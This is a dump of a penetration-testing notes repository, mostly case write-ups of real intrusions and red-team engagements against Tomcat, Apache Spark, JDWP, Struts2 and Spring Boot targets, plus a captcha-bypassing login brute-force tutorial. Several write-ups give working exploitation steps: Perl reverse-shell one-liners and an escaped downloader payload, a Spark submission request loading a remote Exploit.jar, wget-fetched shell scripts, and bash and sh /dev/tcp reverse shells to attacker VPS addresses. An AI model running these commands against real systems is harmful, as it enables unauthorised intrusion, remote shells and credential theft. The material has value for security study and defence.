├── .gitignore ├── 01-案例学习 ├── APP简单逆向到getshell │ ├── APP简单逆向到getshell.html │ └── readme.md ├── Spring Boot Actuator信息泄露导致的mysql密码泄露 │ ├── pic │ │ ├── 1.png │ │ ├── 2.png │ │ └── readme.md │ └── readme.md ├── 一次CNVD-2020-10487漏洞利用 │ ├── readme.md │ └── 一次CNVD-2020-10487漏洞利用.pdf ├── 一次奇葩的任意用户登录 │ ├── readme.md │ └── 一次奇葩的任意用户登录.html ├── 一次对“攻防世界CTF”服务器的入侵尝试 │ └── readme.md ├── 安服仔某渗透项目实战 │ ├── readme.md │ └── 安服仔某渗透项目实战.html ├── 实战记一次微信小程序渗透实战记录 │ ├── readme.md │ └── 实战 _ 记一次微信小程序渗透实战记录.html ├── 当ueditor遇到创某盾.pdf ├── 某地市HVV_之_Apache Struts2打点 │ ├── pic │ │ ├── 1.png │ │ └── readme.md │ └── readme.md ├── 某大厂红队评估_之_Apache Spark打点 │ ├── Exploit.jar │ ├── pic │ │ ├── 1.png │ │ └── readme.md │ └── readme.md ├── 某大厂红队评估_之_JDWP打点 │ ├── pic │ │ ├── 1.png │ │ └── readme.md │ └── readme.md ├── 某次hw中对某虚拟主机上的靶标攻击 │ ├── readme.md │ └── 某次hw中对某虚拟主机上的靶标攻击.html ├── 某网络安全设备逻辑缺陷导致getshell │ ├── readme.md │ └── 奇安信攻防社区-某网络安全设备逻辑缺陷导致get shell.html ├── 爆破带有验证码的Web登录表单 │ ├── 爆破带有验证码的Web登录表单.md │ └── 爆破带有验证码的Web登录表单 │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ ├── 04.png │ │ ├── 05.png │ │ ├── 06.png │ │ ├── 07.png │ │ ├── 08.png │ │ ├── 09.png │ │ ├── 10.png │ │ └── 11.png ├── 记一次常规的Bypass 宝塔防火墙 文件上传.pdf └── 针对某集团红队Web打点突破.html ├── 02-资产收集 ├── 403绕过原理.md └── Host碰撞原理.md ├── 03-漏洞检测 ├── AWVS │ └── awvs14-scan-master │ │ ├── README.md │ │ ├── awvs14_script.py │ │ └── config.ini ├── BurpSuite下repeater中request不能识别空格 │ └── readme.md ├── BurpSuite下repeater出现中文乱码 │ └── readme.md ├── BurpSuite激活指南 │ ├── pic │ │ ├── 1.png │ │ └── readme.md │ └── readme.md ├── BurpSuite爆破时payload被url编码 │ └── readme.md ├── BurpSuite被拦截怎么办 │ ├── bp小tips-开启burp代理被拦截怎么办?.html │ └── readme.md ├── Goby红队版尝试解密 │ ├── readme.md │ └── 尝试解密goby红队版poc │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ ├── 04.png │ │ ├── 05.png │ │ └── 06.png ├── Nessus │ └── readme.md └── Xray │ └── readme.md ├── 04-漏洞利用 ├── 20240701-JAVA环境下SQL注入WAF绕过.md ├── 20240704-Linux下反弹Shell.md ├── ASPX WebShell免杀 │ ├── 1.aspx │ ├── 
ManagementClassofInvokeMethodCheckSpy.aspx │ ├── ObjectDataProviderGetTypeSpy.ashx │ ├── ObjectDataProvidertypeofSpy.ashx │ ├── XamlReaderofParseCheckSpy.aspx │ ├── dynamicCompilerSpy.aspx │ └── readme.md ├── DNSLog自建.md ├── Linux下反弹Shell.md ├── SQL注入 │ ├── MSSQL-Boolean-Blind-EXP │ │ ├── mssql-boolean-blind-exp.py │ │ └── readme.md │ ├── Oracle注入WAF绕过.md │ ├── SQLServer数据库攻击.md │ ├── SQLServer注入WAF绕过.md │ ├── mssql waf绕过检测利用 │ │ ├── pic │ │ │ ├── 0.png │ │ │ ├── 1.png │ │ │ ├── 2.png │ │ │ └── readme.md │ │ └── readme.md │ ├── mssql基本检测利用 │ │ ├── pic │ │ │ ├── 0.png │ │ │ ├── 1.png │ │ │ ├── 2.png │ │ │ ├── 3.png │ │ │ ├── 4.png │ │ │ └── readme.md │ │ └── readme.md │ ├── mysql-time-blind-kkcms-exp │ │ ├── mysql-time-blind-kkcms-exp.py │ │ └── readme.md │ ├── mysql注入waf绕过 │ │ ├── 0.png │ │ ├── 1.png │ │ ├── 2.png │ │ └── readme.md │ ├── sql注入中的dios │ │ ├── 0.png │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ └── readme.md │ ├── 单引号过滤绕过方式 │ │ └── readme.md │ ├── 各种语言注释总结 │ │ └── readme.md │ └── 宽字节注入特性 │ │ └── readme.md ├── SSRF漏洞WAF绕过.md ├── ThinkPHP文件写入WAF绕过 │ ├── 01.png │ ├── 02.png │ ├── 03.png │ ├── 04.png │ ├── 05.png │ └── ThinkPHP文件写入WAF绕过.md ├── WebLogic写入WebShell路径记录.md ├── XXL-JOB渗透简单记录.md ├── Yapi代码执行WAF绕过.md ├── YonYou NC路径记录.md ├── 基于楔形文字的XSS WAF绕过 │ ├── pic │ │ ├── 0.png │ │ └── readme.md │ └── readme.md ├── 明源云.md ├── 极端环境下linux文件下载.pdf ├── 符合JSPX的WebShell.md └── 通用WAF绕过 │ ├── image │ ├── 01.png │ ├── 02.png │ ├── 03.png │ ├── 04.png │ ├── 05.png │ └── 06.png │ └── readme.md ├── 06-移动端 ├── burpsuite如何对苹果手机进行抓包 │ ├── pic │ │ ├── 1.png │ │ ├── 2.png │ │ └── readme.md │ └── readme.md ├── 企业微信Secret Token利用思路 │ └── readme.md ├── 华为nova2下无需root安装Metasploit │ └── readme.md ├── 安卓端安装BurpSuite证书 │ ├── Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园.html │ ├── Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files │ │ ├── 1552062-20190930181009614-220891246.png │ │ ├── 1552062-20190930181050174-353852155.png │ │ ├── 1552062-20190930181532435-1354612174.png │ │ ├── 
1552062-20190930182341419-19222429.png │ │ ├── 1552062-20190930182426538-1131763727.png │ │ ├── 1552062-20190930182446648-387901848.png │ │ ├── 1552062-20190930182502806-1217416539.png │ │ ├── 1552062-20190930182611435-303381481.png │ │ ├── 1552062-20190930182806545-1489946553.png │ │ ├── 1552062-20190930183017302-889351796.png │ │ ├── 1552062-20190930183037804-1109993841.png │ │ ├── 1552062-20190930183156784-996670706.png │ │ ├── 1552062-20190930183223310-1710195029.png │ │ ├── 1552062-20190930183239042-1593406928.png │ │ ├── 1552062-20190930183245631-1543983740.png │ │ ├── 1552062-20190930183651765-1989380630.png │ │ ├── 20160415120337.png │ │ ├── aframe.html │ │ ├── analytics.js.下载 │ │ ├── avatar-default.svg │ │ ├── blog-common.min.css │ │ ├── blog-common.min.js.下载 │ │ ├── bundle-darkgreentrip-mobile.min.css │ │ ├── bundle-darkgreentrip.min.css │ │ ├── cnblogs.css │ │ ├── container.html │ │ ├── f(1).txt │ │ ├── f(2).txt │ │ ├── f.txt │ │ ├── harmoonos-developer-competition-2.jpg │ │ ├── highlight.min.js.下载 │ │ ├── hm.js.下载 │ │ ├── icon_weibo_24.png │ │ ├── jquery-2.2.0.min.js.下载 │ │ ├── js │ │ ├── lite-mode-check.svg │ │ ├── logo.gif │ │ ├── logo.svg │ │ ├── message.svg │ │ ├── myblog.svg │ │ ├── newpost.svg │ │ ├── pubads_impl_2021120601.js.下载 │ │ ├── rx_lidar.js.下载 │ │ ├── saved_resource.html │ │ ├── search.svg │ │ ├── sodar │ │ ├── tctip.min.js.下载 │ │ └── wechat.png │ └── readme.md ├── 小米手机配置BurpSuite证书 │ └── readme.md └── 移动端抓不到包问题解决总结 │ └── readme.md ├── 07-云安全 ├── 学习K8S中常见的21种攻击方式.html ├── 知识星球分享-隐藏信息接管k8s集群.pdf └── 红队视角下的公有云基础组件安全.html └── README.md
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
.DS_Store
--------------------------------------------------------------------------------
/01-案例学习/APP简单逆向到getshell/readme.md:
--------------------------------------------------------------------------------
# Approach summary
```
01. APP penetration test: the engagement opened on a login screen, authentication was delegated to an SSO single sign-on service, and a Chaitin (长亭) WAF sat in front
02. Unpacked, decompiled and hooked the app to get past its anti-capture measures, then reviewed the source and captured traffic; no database credentials or other sensitive data turned up
03. The source revealed a new asset; Shiro deserialization took it in one shot, but writing a webshell ran into character-escaping trouble
04. After fuzzing, base64 combined with `^` escaping got the webshell written
```
--------------------------------------------------------------------------------
/01-案例学习/Spring Boot Actuator信息泄露导致的mysql密码泄露/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/Spring Boot Actuator信息泄露导致的mysql密码泄露/pic/1.png
--------------------------------------------------------------------------------
/01-案例学习/Spring Boot Actuator信息泄露导致的mysql密码泄露/pic/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/Spring Boot Actuator信息泄露导致的mysql密码泄露/pic/2.png
--------------------------------------------------------------------------------
/01-案例学习/Spring Boot Actuator信息泄露导致的mysql密码泄露/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/01-案例学习/Spring Boot Actuator信息泄露导致的mysql密码泄露/readme.md:
--------------------------------------------------------------------------------
If you find unauthenticated Spring Boot Actuator endpoints such as /env, you can try to recover the MySQL password as follows (values that look like passwords are masked in /env, but the heap dump holds them in clear):

1. Try to download the heap dump (the heapdump endpoint)
2. Load the file in Eclipse Memory Analyzer (MAT) (download: https://www.eclipse.org/mat/downloads.php)
3. Pull the resolved configuration with OQL: select * from org.springframework.web.context.support.StandardServletEnvironment
4. Find user sessions by string matching (OQL LIKE takes a regular expression): select * from java.lang.String s WHERE toString(s) LIKE ".SESSION."
5. Passwords can also be located with a fuzzy string search, as in the screenshots below:
![image](./pic/1.png)
![image](./pic/2.png)
--------------------------------------------------------------------------------
/01-案例学习/一次CNVD-2020-10487漏洞利用/readme.md:
--------------------------------------------------------------------------------
# Approach summary
```
01. Found port 8009 open
02. Verified that the Tomcat AJP vulnerability (Ghostcat, CNVD-2020-10487 / CVE-2020-1938) is present
03. The target also ran Redis, reachable from outside; tried to read the Redis password through the file read, but the stored password was encrypted
04. Read web.xml, then pulled the class files (with https://github.com/LandGrey/ClassHound), decompiled them to review the encryption scheme, decrypted the password, connected to Redis and got a shell

There were a few pitfalls along the way
```
--------------------------------------------------------------------------------
/01-案例学习/一次CNVD-2020-10487漏洞利用/一次CNVD-2020-10487漏洞利用.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/一次CNVD-2020-10487漏洞利用/一次CNVD-2020-10487漏洞利用.pdf
--------------------------------------------------------------------------------
/01-案例学习/一次奇葩的任意用户登录/readme.md:
--------------------------------------------------------------------------------
One case went like this:
```
After visiting xxxa.xxx.com and logging in, clicking "personal center" redirected to a login page on xxx.xxx.com. That login was a fake one (it did not actually authenticate). Visiting xxxa.xxx.com again and logging in a second time produced a real login.

Root cause: unknown
```
Reference: https://mp.weixin.qq.com/s/Pg432Bd1jD2JIK6n1ipbXg
--------------------------------------------------------------------------------
/01-案例学习/一次对“攻防世界CTF”服务器的入侵尝试/readme.md:
--------------------------------------------------------------------------------
Everything below is a purely hypothetical, step-by-step thought experiment; it is fiction.

First, a summary of how multiple commands can be chained on Linux, prompted by the remote command execution challenge:
;   the second command runs regardless of whether the first succeeded
||  the second command runs only if the first failed
&&  the second command runs only if the first succeeded
|   primarily the pipe operator, but it also chains commands (stdout of the first feeds stdin of the second)
&   primarily backgrounds a command, but it also chains commands (the first runs in the background while the second starts)

The RCE challenge got me thinking, and I could not resist trying it:
Target environment: Ubuntu 14.04
Local test environment: Kali 2019 + Ubuntu 16.04
Current user: www-data

[0: A glimmer of hope]
Looking for a way to download files: wget -V, curl -V and ftp -h had all been removed; python -V failed as well; perl -v finally printed a version, which was the glimmer of hope; ruby -v also failed.

[1: Local testing]
Perl snippet implementing the download:
```
use LWP::Simple;
$name="长春";
$url="http://192.168.1.213:8080/WellsoftTest/servlet/Httpservletwell?bz=k&name=$name&index=0";
$coont =get($url);
die "not found link.." if(!defined($coont));   # get() returns undef on failure
open $file,">t.txt" or die "couldn't open t.txt ..\n";
print $file $coont;
print "print succeed...\n";
close($file);
print "succeed,File is t.txt, exit.....";
<>
```
Tested: the download works.
Generate a Perl reverse shell with msfvenom:
```
msfvenom -p cmd/unix/reverse_perl lhost=xxxx lport=xxxx -o /var/www/html/x.pl
```
The generated Perl one-liner:
```
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.xx.xx:xx");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
```
It errored when executed, and again on a second attempt; the version that finally worked is:
```
use IO::Socket::INET;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.xx.xx:xx");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~/(.*)/){system $1;}};
```
Set up a listener on Kali and received the callback. Local test passed; on to the real target.

2: [Actual attack]
The first problem: how to get a Perl script with download capability onto the target? echo it.
The very first statement
```
echo use LWP::Simple;
```
already failed: the shell treats the unquoted `;` as a command separator, so echo never receives it.
Back to local testing. After a lot of trial and error it turned out that many special characters need escaping, including ; $ " ( ) ! and others. The trimmed-down script:
```
use LWP::Simple;
$url="http://192.168.149.130/r.pl";
$coont=get($url);
die "not found link.."
if(!defined($coont));
open $file,">r.pl" or die "couldn't open t.txt ..\n";
print $file $coont;
close($file);
exit;
<>
```
Collapse the code to a single line and escape everything; the final payload:
```
echo use LWP::Simple\;\$url=\"http://supplied.6655.la/r.txt\"\;\$coont=get\(\$url\)\;die \"not found link..\" if\(\!defined\(\$coont\)\)\;open \$file,\"\>r.pl\" or die \"couldn\'t open t.txt ..\\n\"\;print \$file \$coont\;close\(\$file\)\;exit\;>d.pl
```
Ran it: no success.
ls -alh        # no write permission in the current directory
ls -alh /      # the current user can write to /tmp/
Ran the payload again and created the Perl downloader under /tmp/
Ran perl /tmp/d.pl, but the reverse-shell Perl script was never downloaded
ifconfig showed an internal IP
ping -c 2 <gateway> >/tmp/a.txt       # the gateway is reachable
ping -c 2 www.baidu.com >/tmp/b.txt   # external domain names are not
ping -c 2 202.98.0.68                 # external IPs are not either

Dead end; stopping here. Lesson for next time: check whether the target can reach the internet before anything else.
--------------------------------------------------------------------------------
/01-案例学习/安服仔某渗透项目实战/readme.md:
--------------------------------------------------------------------------------
# Approach summary
```
01. AWVS plus manual testing found a SQL injection
02. The stack was .NET + MSSQL and the injection ran with DBA privileges, which gave operating-system command execution directly
03. No AV on the target, so privilege escalation was straightforward
04. Weak-password scanning across the internal network harvested a batch of servers and FTP accounts
```
--------------------------------------------------------------------------------
/01-案例学习/实战记一次微信小程序渗透实战记录/readme.md:
--------------------------------------------------------------------------------
# Approach summary
```
01. Set up the environment
02. Decompile the mini program with a tool to recover the JS source
03. When auditing, look for unauthenticated APIs first
04. Other findings are possible too, such as leaked account credentials or a leaked secret and appid
```
--------------------------------------------------------------------------------
/01-案例学习/当ueditor遇到创某盾.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/当ueditor遇到创某盾.pdf
--------------------------------------------------------------------------------
/01-案例学习/某地市HVV_之_Apache Struts2打点/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/某地市HVV_之_Apache Struts2打点/pic/1.png
--------------------------------------------------------------------------------
/01-案例学习/某地市HVV_之_Apache Struts2打点/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/01-案例学习/某地市HVV_之_Apache Struts2打点/readme.md:
--------------------------------------------------------------------------------
# 0x01 Discovery
A teammate compiled the addresses and fingerprints of all of the target's OA systems, 7 in total, including Seeyon (致远), Weaver (泛微) and others
Vulnerability checks against the 7 OA systems found no N-day vulnerabilities
A full-port nmap scan of the IPs hosting the 7 OA systems, reviewing each port in turn, showed one port that accepted the PUT and DELETE methods, which looked suspicious. Opening it in a browser showed .action URLs, pointing to a possible Struts2 vulnerability
# 0x02 Verification
A Struts2 scanner reported S2-045. Attempting to execute a command returned "connection reset", which suggests a WAF
# 0x03 Bypassing the protection
Two options: bypass the command-execution restriction, or upload a webshell. Uploading a webshell is the easier of the two, so that came first
Uploaded a .jsp webshell: requesting it returned 403
Uploaded a .txt file: accessible, so uploads do work
Guess: the earlier 403 is the web server refusing to serve .jsp files

A series of attempts followed:
Uploading a .action file redirected to the home page
Arbitrary extensions were not parsed
A .jspx webshell was accessible, and Godzilla (哥斯拉) connected to it, as shown below
![image](./pic/1.png)
--------------------------------------------------------------------------------
/01-案例学习/某大厂红队评估_之_Apache Spark打点/Exploit.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/某大厂红队评估_之_Apache Spark打点/Exploit.jar
--------------------------------------------------------------------------------
/01-案例学习/某大厂红队评估_之_Apache Spark打点/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/某大厂红队评估_之_Apache Spark打点/pic/1.png
--------------------------------------------------------------------------------
/01-案例学习/某大厂红队评估_之_Apache Spark打点/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/01-案例学习/某大厂红队评估_之_Apache Spark打点/readme.md:
--------------------------------------------------------------------------------
# 0x01 Discovery
Working a project as a team, a colleague found an unauthenticated Apache Spark page and I took on the exploitation, hence this write-up
# 0x02 First attempt
Target: http://182.61.xxx.xxx:8080
Searched for Apache Spark exploit write-ups and fired the POC directly; unsurprisingly, it failed
(Note: when starting an nc listener on an Aliyun VPS, the -n option is needed, i.e. nc -lnvvvp 101.200.xx.xx 8888; reason unknown)
# 0x03 Local debugging
Built a local environment from the vulhub project: https://github.com/vulhub/vulhub/tree/master/spark/unacc
(Note: a port was already in use while setting up, and netstat -antup did not show the owning PID and process name because of insufficient privileges; sudo netstat -antup does. sudo is easy to forget)

Once built, [http://192.168.202.128:8080](http://192.168.202.128:8080) loaded, confirming the environment
Port 6066 was reachable locally but not on the target, so the target has 6066 closed
This vulnerability can be exploited through two ports, 6066 (the REST submission API) and 7077 (the master's RPC port, which defenders tend to overlook), and the target's 7077 was open, so there was still hope
First, test the 6066 path locally with the following Burp request
```
POST /v1/submissions/create HTTP/1.1
Host: your-ip:6066
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/json
Connection: close
Content-Length: 680

{
    "action": "CreateSubmissionRequest",
    "clientSparkVersion": "2.3.1",
    "appArgs": [
        "id_whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
    ],
    "appResource": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
    "environmentVariables": {
        "SPARK_ENV_LOADED": "1"
    },
    "mainClass": "Exploit",
    "sparkProperties": {
        "spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
        "spark.driver.supervise": "false",
        "spark.app.name": "Exploit",
        "spark.eventLog.enabled": "true",
        "spark.submit.deployMode": "cluster",
        "spark.master":
"spark://your-ip:6066"
    }
}
```
Exploitation failed

On reflection, the target probably cannot reach GitHub and therefore never fetched Exploit.jar. I hosted Exploit.jar on my own VPS, updated the request and resent it; this time the response came back
The response contains a driverId. Substitute that value for the driverId below and open
```
http://192.168.202.128:8081/logPage/?driverId=driver-20211014035556-0013&logType=stdout
```
The page shows the output of the executed commands

Testing the 7077 path locally
```
./spark-submit --master spark://192.168.202.128:7077 --deploy-mode cluster --class Exploit http://101.200.xx.xx:8000/Exploit.jar id
```
spark-submit download: https://archive.apache.org/dist/spark/spark-2.4.3/spark-2.4.3-bin-hadoop2.7.tgz
(Note: download the binary distribution, not the source tarball, or spark-submit will error out)
Checked the result the same way as above: the command ran

Reverse shell through port 7077, directly
```
./spark-submit --master spark://192.168.202.128:7077 --deploy-mode cluster --class Exploit http://101.200.xx.xx:8000/Exploit.jar "bash -i >& /dev/tcp/101.200.xx.xx/8888 0>&1"
```
No shell arrived on the VPS

Thinking it over, the special characters in the bash reverse shell were the likely problem, so the payload was base64-encoded via http://www.jackson-t.ca/runtime-exec-payloads.html
Sent the encoded payload; still no shell

Digging further into Exploit.jar's source shows why: the original author splits the argument on commas, so the base64-encoded command, which itself contains commas, is cut into fragments
```
String[] cmds = args[0].split(",");

bash -c {echo,YmFzaCAtaSA+JiAvZGxxxxxxxxxxxxEuMjAwLjE0NC41NS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}
```
With the cause identified, the separator can be changed from comma to underscore and the class repackaged as a jar; the rebuilt jar is in this directory
(If you look closely at the Burp request above, I had already put an underscore between the first two commands)

Ran it again and received the reverse shell
![image](./pic/1.png)

# 0x04 References:
https://www.cnblogs.com/mutudou/p/14685277.html
https://medium.com/@Wh0ale/apache-spark-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E-ada9eb02af65
https://github.com/vulhub/vulhub/tree/master/spark/unacc
https://github.com/aRe00t/rce-over-spark/blob/master/Exploit.java
--------------------------------------------------------------------------------
/01-案例学习/某大厂红队评估_之_JDWP打点/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/某大厂红队评估_之_JDWP打点/pic/1.png
--------------------------------------------------------------------------------
/01-案例学习/某大厂红队评估_之_JDWP打点/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/01-案例学习/某大厂红队评估_之_JDWP打点/readme.md:
--------------------------------------------------------------------------------
# 0x01 Discovery
An nmap scan of a target's /24 took about 19 hours. Going through the identified fingerprints one by one, this turned up:
```
5005/tcp open  jdwp    Java Debug Wire Protocol (Reference Implementation) version 1.8 1.8.0_191
|_jdwp-info: ERROR: Script execution failed (use -d to debug)
```
Having reproduced JDWP exploitation before, I wrote this up

# 0x02 Quick check
telnet 106.53.xx.xx 5005
If the service answers JDWP-Handshake, it is exploitable
Mine did not return JDWP-Handshake; I ignored that and pressed on
# 0x03 DNSLog test
1. Start with a dnslog probe
POC: https://github.com/IOActive/jdwp-shellifier
Run
```
python2 jdwp-shellifier.py -t 192.168.3.118 -p 8787 --break-on "java.lang.String.indexof" --cmd "ping xx.dnslog.cn"
```
The dnslog platform received the callback, so this looks promising
# 0x04 Reverse shell
Save the following as shell.txt on the VPS and serve it with a temporary Python 3 HTTP server (the trailing `%` is most likely zsh's missing-newline marker copied from the terminal, not part of the payload)
```
nc 192.168.178.129 3333 | /bin/bash | nc 192.168.178.129 4444%
```
Open two listeners: commands are typed into the first, and their output comes back on the second
```
Note: on an Aliyun VPS the nc listener needs the -n option, otherwise it errors out

nc -lnvvp 3333
nc -lnvvp 4444
```
Use the POC to download the shell, make it executable, and run it
```
python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "wget http://192.168.178.129:8000/shell.txt -O /tmp/shell.sh"
python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "chmod a+x /tmp/shell.sh"
python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on
"java.lang.String.indexof" --cmd "/tmp/shell.sh"
```
All three ran, yet no shell came back to the VPS
Thinking it over: the payload calls back with nc, and the target probably has no nc. Switched to sh and changed shell.txt to
```
sh -i >& /dev/tcp/101.200.xx.xx/3333 0>&1 | /bin/sh | sh -i >& /dev/tcp/101.200.xx.xx/4444 0>&1%
```
A reverse shell arrived, as shown below
![image](./pic/1.png)

# 0x05 Reference:
https://blog.csdn.net/weixin_43486390/article/details/114259762
--------------------------------------------------------------------------------
/01-案例学习/某次hw中对某虚拟主机上的靶标攻击/readme.md:
--------------------------------------------------------------------------------
# Approach summary
```
01. ping revealed other CNAME records, suggesting a CDN; visiting the site showed the target was a virtual host
02. The ICP filing number identified the IDC provider
03. Attacked the IDC provider: the forgot-password page allowed username enumeration; using the target's domain as the username passed into the password-reset step
04. The password-reset flow exposed other domains; subdomain enumeration turned up new assets
05. One new asset had a Shiro vulnerability, exploitable directly
06. Extracted passwords with mimikatz, logged in remotely, gathered information
07. Finally reset the virtual host's password
```
--------------------------------------------------------------------------------
/01-案例学习/某网络安全设备逻辑缺陷导致getshell/readme.md:
--------------------------------------------------------------------------------
```
Summary of the article (the author's approach):
1. Choose a target product: the vendor's website shows which security appliances it sells, the appliances' web UIs show which have the crudest interfaces, and internet-wide search engines show which are most widely deployed; weigh these and pick one
2. Collect the device's weak/default credentials from the internet; they had already been fixed
3. Internet asset collection found a directory traversal
4. PHP files returned an error when read directly; appending ::$DATA (the NTFS alternate-data-stream suffix) read them successfully
5. /data/login.php contained a built-in backdoor (unclear whether a malicious one or a convenience for development and testing)
6. In the admin backend, an unprotected upload point gave a webshell
```
--------------------------------------------------------------------------------
/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单.md:
--------------------------------------------------------------------------------
# Rant
Browsing GitHub I came across a project on brute-forcing web login forms protected by a captcha. The author adapted c0ny1's captcha-killer project; the write-up is a little thin and it took me a good while to get working, so I am recording the procedure for myself and others (about 3 hours)

This is a tutorial, in five steps, step1 to step5
# step1 - install the plugin
Download and install the plugin
Download: https://github.com/f0ng/captcha-killer-modified/releases

# step2 - fetch the captcha image with the plugin
Among the requests Burp captures, one fetches the captcha image; send that request to the plugin's captcha panel
![image](./爆破带有验证码的Web登录表单/01.png)
Click "获取" (fetch) in the captcha-killer-modified tab; the captcha is retrieved normally
![image](./爆破带有验证码的Web登录表单/02.png)

# step3 - start a local captcha-recognition API
We use an open-source captcha recognizer from GitHub (ddddocr): no usage limits, roughly 80% accuracy
```
pip3.exe install ddddocr

python3.exe .\codereg.py
```
codereg.py is at: https://github.com/f0ng/captcha-killer-modified/blob/main/codereg.py
![image](./爆破带有验证码的Web登录表单/04.png)


# step4 - recognize the captcha
In the captcha-killer-modified tab, set the API URL to the address the script listens on
```
http://127.0.0.1:8888
```
Request template (the image is sent base64-encoded in the body; the plugin's tag pair wraps the raw image):
```
POST /reg HTTP/1.1
Host: 127.0.0.1:8888
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

<@BASE64><@IMG_RAW></@IMG_RAW></@BASE64>
```
Click "识别" (recognize); the captcha text is recognized
![image](./爆破带有验证码的Web登录表单/05.png)
Click "锁定" (lock)
![image](./爆破带有验证码的Web登录表单/03.png)

# step5 - brute force
Intercept the login request in Burp
![image](./爆破带有验证码的Web登录表单/06.png)
Send it to Intruder and choose the Pitchfork attack type
![image](./爆破带有验证码的Web登录表单/07.png)
Payload 1 is a normal wordlist; configure payload 2 as shown (the extension-generated payload provided by captcha-killer-modified)
![image](./爆破带有验证码的Web登录表单/08.png)
![image](./爆破带有验证码的Web登录表单/09.png)
Use 1 thread with a 500 ms delay between requests, so every request gets its own freshly fetched and recognized captcha
![image](./爆破带有验证码的Web登录表单/10.png)
The captcha-protected form is brute-forced successfully, with roughly 80% recognition accuracy
![image](./爆破带有验证码的Web登录表单/11.png)

# References
https://mp.weixin.qq.com/s/_P6OlL1xQaYSY1bvZJL4Uw
https://github.com/f0ng/captcha-killer-modified
https://github.com/c0ny1/captcha-killer
https://gv7.me/articles/2019/burp-captcha-killer-usage/
https://github.com/sml2h3/ddddocr
-------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/01.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/02.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/03.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/04.png: -------------------------------------------------------------------------------- 